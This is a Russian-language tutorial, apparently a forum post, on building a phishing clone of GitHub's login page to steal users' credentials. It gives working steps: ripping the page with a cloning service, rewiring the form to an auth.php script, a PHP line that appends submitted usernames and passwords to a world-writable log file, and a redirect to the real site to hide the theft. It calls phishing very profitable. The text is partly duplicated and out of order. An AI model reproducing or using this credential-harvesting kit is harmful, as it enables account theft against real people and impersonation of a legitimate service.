В этой статье я хочу вам рассказать о том, как можно создай фишинг из любого сайта. Кто не знает, фишинг это клон какой-то страницы с авторизацией, например гитхаб, вк или почты. Погнали!
Для РИПа (клонирования) будем использовать сервис - WebParse
Регистрируем временную почту Temp Mail далее регистрируемся на WebParse, и в поле для домена копируем нужную страницу:
После клонирования вам на почту придёт письмо с ссылкой на архив со страницей:
Меняем его на auth.php
На скрине параметр уже изменён.
Теперь в папке с html файлом создаём auth.php и папку base:
Onion.net
Открываем auth.php в текстовом редакторе (я юзаю NotePad++.) и добавляем следующий код:
file_put_contents функция для записи данных в файл, base/ds_logs.txt - путь к файлу, где сохранятся пароли, FILE_APPEND - указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец.
Теперь загружаем всё это дело на хостинг, а папке base даём права 777
Переходим на сайт и вводим данные, они сохранятся по ссылке: вашдомен.com/base/ds_logs.txt
После ввода логина и пароля, жертва переместится по ссылке github.com/session тем временем у нас:
На этом статья подходит к концу, для полноты картины можно было сверстать простую админку с авторизацией, блекджеком и шлюхами.
Теория об фишинге
Отойдем немного к теории, фишинг это очень прибыльная тема, на самом деле тут необходимо просто продумать схему - как запутать людей и чтоб они перешли на ваш фейковый сайт и ввели свои данные. Социальная инженерия.Приступим к первому этапу
Итак, для начала ищем авторизацию на нужном нам сайте, я буду приводить в пример гитхаб, получается вот эта ссылка - https://github.com/login
Для РИПа (клонирования) будем использовать сервис - WebParse
Регистрируем временную почту Temp Mail далее регистрируемся на WebParse, и в поле для домена копируем нужную страницу:
Второй этап
Скачали, распаковали. Теперь нам нужно реализовать сохранение введённых паролей. За это отвечает параметр action, нам нужно его изменить:
Меняем его на auth.php
На скрине параметр уже изменён.
Теперь в папке с html файлом создаём auth.php и папку base:
Onion.net
Открываем auth.php в текстовом редакторе (я юзаю NotePad++.) и добавляем следующий код:
Код:
<?php
file_put_contents('base/ds_logs.txt', "Username: ".$_POST['login']." Password: ".$_POST['password'].'\n', FILE_APPEND);
?>Теперь загружаем всё это дело на хостинг, а папке base даём права 777
Переходим на сайт и вводим данные, они сохранятся по ссылке: вашдомен.com/base/ds_logs.txt
Пароли сохраняются, но после попытки авторизоваться ничего не происходит, поэтому добавим в auth.php следующее:
Код:
header('Location: https://github.com/session');На этом статья подходит к концу, для полноты картины можно было сверстать простую админку с авторизацией, блекджеком и шлюхами.
